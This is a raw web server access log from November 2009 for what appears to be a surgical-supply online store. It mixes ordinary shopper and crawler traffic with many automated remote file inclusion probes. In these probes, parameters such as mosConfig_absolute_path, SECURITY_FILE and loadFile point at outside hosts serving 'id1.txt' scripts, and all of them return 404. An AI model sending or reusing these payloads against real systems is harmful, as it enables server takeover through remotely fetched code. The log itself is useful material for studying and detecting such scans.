204.202.2.23 - - [26/Nov/2009:00:28:33 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.202.2.23 - - [26/Nov/2009:00:28:33 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.172.162.163 - - [26/Nov/2009:00:29:03 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.172.162.163 - - [26/Nov/2009:00:29:03 -0500] "GET /logs/access_log.Q109102900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.172.162.163 - - [26/Nov/2009:00:29:03 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:00:29:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:00:29:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:00:29:20 -0500] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.130.149.241 - - [26/Nov/2009:00:29:22 -0500] "GET /logs/access_log.Q109053000%20%20/convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:29:28 -0500] "GET /logs/access_log.Q109062800%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:29:28 -0500] "GET /logs/access_log.Q109081500%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:43 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:43 -0500] "GET /logs/access_log.Q109072500%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:43 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:29:42 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):dawnweb HTTP/1.1" 200 36038 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:29:44 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
203.172.162.163 - - [26/Nov/2009:00:29:52 -0500] "GET /logs/access_log.Q109110600%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.esperandoportuamor.com/modules/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:55 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:55 -0500] "GET /logs/access_log.Q109072500%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:29:55 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:00:29:56 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.209.27 - - [26/Nov/2009:00:30:00 -0500] "GET /logs/access_log.Q109062800%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:00:30:11 -0500] "GET /images/items/index19_tempindi.jpg HTTP/1.1" 200 3706 "-" "Googlebot-Image/1.0"
210.127.209.27 - - [26/Nov/2009:00:30:11 -0500] "GET /logs/access_log.Q109081500%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:30:30 -0500] "GET /logs/access_log.Q109091100%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:30:35 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05483A11000A1DC088+M37+ENG HTTP/1.1" 200 36038 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):dawnweb" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:30:36 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
83.103.72.130 - - [26/Nov/2009:00:30:42 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:30:42 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:30:42 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:30:43 -0500] "GET /logs/access_log.Q109091100%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:30:44 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05784814000D8CC088+M37+ENG HTTP/1.1" 200 36038 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05483A11000A1DC088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:30:45 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
190.97.219.4 - - [26/Nov/2009:00:30:49 -0500] "GET /logs/access_log.Q109093000%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:30:52 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05F8D91F000DFDC088+M37+ENG HTTP/1.1" 200 36038 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05784814000D8CC088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:30:53 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
64.191.166.24 - - [26/Nov/2009:00:30:56 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:00:30:57 -0500] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:00:31:01 -0500] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:31:02 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A0578F31E000E55C088+M37+ENG HTTP/1.1" 200 37997 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05F8D91F000DFDC088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:31:03 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
64.191.166.24 - - [26/Nov/2009:00:31:16 -0500] "GET /logs/access_log.Q109051800//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:31:16 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05181F12000F97C088+M37+ENG HTTP/1.1" 200 76945 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A0578F31E000E55C088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:31:18 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
82.195.252.206 - - [26/Nov/2009:00:31:25 -0500] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:00:31:25 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
113.52.152.25 - - [26/Nov/2009:00:31:56 -0500] "GET /convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
113.52.152.25 - - [26/Nov/2009:00:31:56 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://mortgagefieldrep.com/images/.source/id.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:32:08 -0500] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05181F12000F97C088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
118.107.162.36 - - [26/Nov/2009:00:32:09 -0500] "GET /logs/access_log.Q109092200///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:32:11 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05E85512000F77C088+M37+ENG HTTP/1.1" 200 45273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:32:12 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:32:17 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
66.102.237.81 - - [26/Nov/2009:00:32:26 -0500] "GET //ImpExData.php?systempath=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.102.237.81 - - [26/Nov/2009:00:32:26 -0500] "GET /logs/error_log.Q109052900//ImpExData.php?systempath=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.102.237.81 - - [26/Nov/2009:00:32:26 -0500] "GET /logs//ImpExData.php?systempath=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:32:32 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A05E85A1D000F67C088+M37+ENG HTTP/1.1" 200 36074 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05181F12000F97C088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:32:34 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
82.195.252.206 - - [26/Nov/2009:00:32:35 -0500] "GET /logs/access_log.Q109051800//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:00:32:54 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.91.144 - - [26/Nov/2009:00:33:01 -0500] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:00:33:01 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:00:33:09 -0500] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:33:17 -0500] "GET //common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:33:17 -0500] "GET /logs/access_log.Q109070500%20%20//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:33:17 -0500] "GET /logs//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:00:33:24 -0500] "GET /logs/access_log.Q109051800//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:33:25 -0500] "GET ///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:33:38 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A157830180004C1C088+M37+ENG HTTP/1.1" 200 37533 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A05E85A1D000F67C088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:33:39 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
118.107.162.36 - - [26/Nov/2009:00:33:40 -0500] "GET /logs///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.107.162.36 - - [26/Nov/2009:00:33:40 -0500] "GET /logs/error_log.Q109071700///components/com_flyspray/startdown.php?file=http://21tv.org/bbs///zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.110.22.144 - - [26/Nov/2009:00:33:49 -0500] "GET /logs/error_log.Q109110700%20%20//common/db.php?commonpath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:33:52 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A156880180008F3C088+M37+ENG HTTP/1.1" 200 77213 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A157830180004C1C088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:33:54 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:34:00 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A1538E81100096EC088+M37+ENG HTTP/1.1" 200 40913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:34:01 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:34:10 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143A15A87F1D0009AAC088+M37+ENG HTTP/1.1" 200 40077 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143A1538E81100096EC088+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:34:12 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
190.97.219.4 - - [26/Nov/2009:00:36:11 -0500] "GET /logs/access_log.Q109093000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
98.125.95.195 - - [26/Nov/2009:00:37:35 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143A15A87F1D0009AAC088+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:37:35 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:37:40 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143A1538E81100096EC088+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:37:40 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:37:44 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143A156880180008F3C088+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:37:44 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
211.192.6.47 - - [26/Nov/2009:00:37:49 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.192.6.47 - - [26/Nov/2009:00:37:49 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [26/Nov/2009:00:37:54 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.192.6.47 - - [26/Nov/2009:00:37:59 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.192.6.47 - - [26/Nov/2009:00:37:59 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.125.95.195 - - [26/Nov/2009:00:38:26 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0102001 HTTP/1.1" 200 37497 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:27 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:37 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0183A258888110009E7C014+M37+ENG HTTP/1.1" 200 77213 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0102001" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:39 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:42 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0183A25381C1A000A27C014+M37+ENG HTTP/1.1" 200 40913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
98.125.95.195 - - [26/Nov/2009:00:38:43 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
83.103.72.130 - - [26/Nov/2009:00:38:43 -0500] "GET /logs//index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:38:43 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:38:44 -0500] "GET //index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:38:44 -0500] "GET /logs//index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:00:38:44 -0500] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://reveilletavie.com/banners/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
